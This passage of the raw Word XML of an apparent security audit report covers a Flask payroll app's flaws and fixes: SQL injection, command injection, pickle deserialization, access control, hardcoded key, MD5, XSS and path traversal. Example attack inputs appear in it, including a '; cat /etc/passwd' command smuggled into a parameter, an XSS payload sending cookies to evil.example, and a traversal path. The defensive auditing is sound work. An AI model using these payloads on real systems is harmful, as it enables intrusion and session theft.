        <w:t xml:space="preserve">cur = conn.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full authentication bypass, unauthorized read/write access to the database, and potential extraction of every employee record (including salary and SSN fields present in the schema).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Always use parameterized queries / prepared statements (the DB-API '?' placeholder in sqlite3, or an ORM such as SQLAlchemy). Never build SQL by string formatting or concatenation with user input, and treat every input field as untrusted regardless of source.</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user = conn.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "SELECT * FROM users WHERE username = ?", (username,)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">).fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-07 — OS Command Injection in /ping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BE1E1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B00020"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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CWE-78</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A03:2021 – Injection</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ping(), line ~106</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 'host' query parameter is concatenated into a shell command string executed with shell=True. Shell metacharacters (;, |, &amp;&amp;, $(...)) in the parameter let an attacker run arbitrary operating system commands with the privileges of the web process, e.g. host=127.0.0.1; cat /etc/passwd.</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result = subprocess.run(f"ping -c 1 {host}", shell=True, capture_output=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remote code execution on the application server, potentially leading to full host compromise, lateral movement, and data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoid shell=True. Pass commands as an argument list so the OS executes the binary directly without shell interpretation, and strictly validate/allowlist any input that reaches a subprocess call (here, requiring a syntactically valid IP address).</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ipaddress.ip_address(host)  # reject anything that is not a literal IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">result = subprocess.run(["ping", "-c", "1", host], shell=False, capture_output=True, timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-08 — Insecure Deserialization via pickle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BE1E1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B00020"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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CWE-502</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A08:2021 – Software and Data Integrity Failures</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import_profile(), line ~114</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pickle.loads() executes arbitrary code embedded in the byte stream during deserialization. Because this endpoint deserializes the raw HTTP request body with no authentication or validation, any anonymous caller can supply a crafted pickle payload to achieve code execution.</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data = request.get_data()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">profile = pickle.loads(data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unauthenticated remote code execution — the most severe class of vulnerability in this application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never unpickle data from an untrusted source. Use a safe, structured format such as JSON with explicit schema validation. If a Python-native format is required internally, keep it entirely off any network-reachable endpoint.</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 Endpoint removed. If needed, replace with a JSON payload validated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"># against a strict schema (e.g. pydantic or marshmallow), never pickle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-04 — Broken Access Control / Insecure Direct Object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BE1E1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B00020"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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CWE-862 / CWE-639</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A01:2021 – Broken Access Control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dashboard() and update_salary(), multiple lines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dashboard() trusts a client-supplied user_id query parameter instead of relying solely on the authenticated session, letting any logged-in user view any other employee's record by changing the ID. update_salary() has no authentication or role check whatsoever, so any client — logged in or not — can modify salary data.</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user_id = request.args.get("user_id", session.get("user_id"))</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/admin/update-salary has no role check at all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Horizontal privilege escalation (viewing other employees' salary/SSN data) and vertical privilege escalation (an unauthenticated user modifying payroll data).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Derive identity/authorization exclusively from the server-side session, never from client-supplied parameters. Add an explicit authorization check (role or ownership) on every endpoint that reads or writes another user's data, ideally enforced through a shared decorator/middleware so it can't be forgotten on a new route.</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@app.route("/admin/update-salary", methods=["POST"])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">@login_required(role="admin")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">def update_salary():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-01 — Hardcoded Secret Key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DEDE0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C77700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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CWE-798</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A02:2021 – Cryptographic Failures</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line 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flask's secret_key signs session cookies. A hardcoded value checked into source control is visible to anyone with repository access (including in git history after a later 'fix') and is identical across every deployment.</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app.secret_key = "sk_live_9f8a7b6c5d4e3f2a1b0c"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anyone who obtains the key can forge valid session cookies, impersonating any user including admins, and can decrypt/tamper with any signed data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Load secrets from environment variables or a secrets manager (e.g. AWS Secrets Manager, HashiCorp Vault), generate a high-entropy value per environment, rotate periodically, and never commit secrets to version control (use a pre-commit secret scanner).</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app.secret_key = os.environ["FLASK_SECRET_KEY"]  # injected via secrets manager / env var</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-02 — Weak, Unsalted Password Hashing (MD5)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DEDE0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C77700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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CWE-916</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A02:2021 – Cryptographic Failures</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hash_password(), line ~45</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MD5 is cryptographically broken and extremely fast, making brute-force and rainbow-table attacks practical. There is no per-user salt, so identical passwords produce identical hashes across all accounts.</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def hash_password(pw):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return hashlib.md5(pw.encode()).hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the users table is ever exposed (e.g. via the SQL injection above), most passwords could be recovered within minutes using commodity hardware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a purpose-built, slow, salted password hashing algorithm — PBKDF2, bcrypt, scrypt, or Argon2 — via a maintained library (werkzeug.security, passlib, or argon2-cffi). Never use general-purpose hash functions (MD5, SHA-1, SHA-256) directly for passwords.</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from werkzeug.security import generate_password_hash, check_password_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">hashed = generate_password_hash(password)          # PBKDF2, salted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">valid  = check_password_hash(user["password"], password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-05 — Reflected Cross-Site Scripting (XSS)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DEDE0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C77700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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CWE-79</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A03:2021 – Injection</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dashboard(), line ~90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 'name' query parameter is inserted directly into an HTML template string that is then rendered, with no escaping. A payload such as ?name=&lt;script&gt;document.location='//evil.example/'+document.cookie&lt;/script&gt; executes in the victim's browser when they click a crafted link.</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template = f"&lt;h1&gt;Welcome {name}&lt;/h1&gt;..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">return render_template_string(template)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Session hijacking, credential theft, and arbitrary actions performed in the victim's authenticated context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never build HTML via string interpolation of user input. Use Jinja2's render_template() (auto-escaping is on by default) rather than render_template_string() with f-strings, and explicitly escape any value that must be inserted into raw HTML. Add a Content-Security-Policy header as defense in depth.</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from markupsafe import escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">name = escape(request.args.get("name", ""))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"># Prefer render_template() with Jinja2 auto-escaping over string building</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-06 — Path Traversal in File Download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DEDE0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C77700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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CWE-22</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A01:2021 – Broken Access Control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download(), line ~97</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 'file' parameter is joined to the uploads directory without sanitization. A value such as ../../etc/passwd (or an absolute path) escapes the intended directory and reads arbitrary files readable by the process.</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path = os.path.join("uploads", filename)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">with open(path, "rb") as f:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return f.read()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disclosure of arbitrary files on the server, including configuration files, source code, and credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strip any directory components from user-supplied filenames, resolve the final path with os.path.abspath, and verify it is still inside the intended base directory before opening it. Prefer serving files via send_from_directory(), which performs equivalent checks.</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safe_name = os.path.basename(filename)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">full_path = os.path.abspath(os.path.join(UPLOAD_DIR, safe_name))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">if not full_path.startswith(UPLOAD_DIR + os.sep):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    abort(400)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
